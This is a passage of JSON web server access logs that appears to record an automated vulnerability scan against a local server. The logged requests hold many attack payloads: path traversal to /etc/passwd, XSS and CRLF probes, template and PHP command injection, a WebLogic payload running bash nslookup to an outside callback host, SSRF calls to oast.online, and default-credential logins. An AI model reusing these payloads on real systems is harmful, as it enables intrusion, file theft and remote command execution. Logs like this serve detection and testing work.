HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://c9v8hs0smpv8c6ag07h0ad8cdnogkkezc.oast.online\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://c9v8hs0smpv8c6ag07h09ujfepwqtyt1p.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/297MbG9zx8sxPVdkHasbkxAh4ys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"userid=kevinlab&userpass=kevin003","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/proc.php?type=login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://c9v8hs0smpv8c6ag07h0qqbcs5q9o7ygh.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"aps=c9v8hs0smpv8c6ag07h09oqgtfecos9f5.oast.online&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.pwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lfm.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /bin/bash\x0D\x0A \x0D\x0A \x0D\x0A -c\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9v8hs0smpv8c6ag07h04s9e4s6een165.oast.online\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /install/install.php?step=4 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health 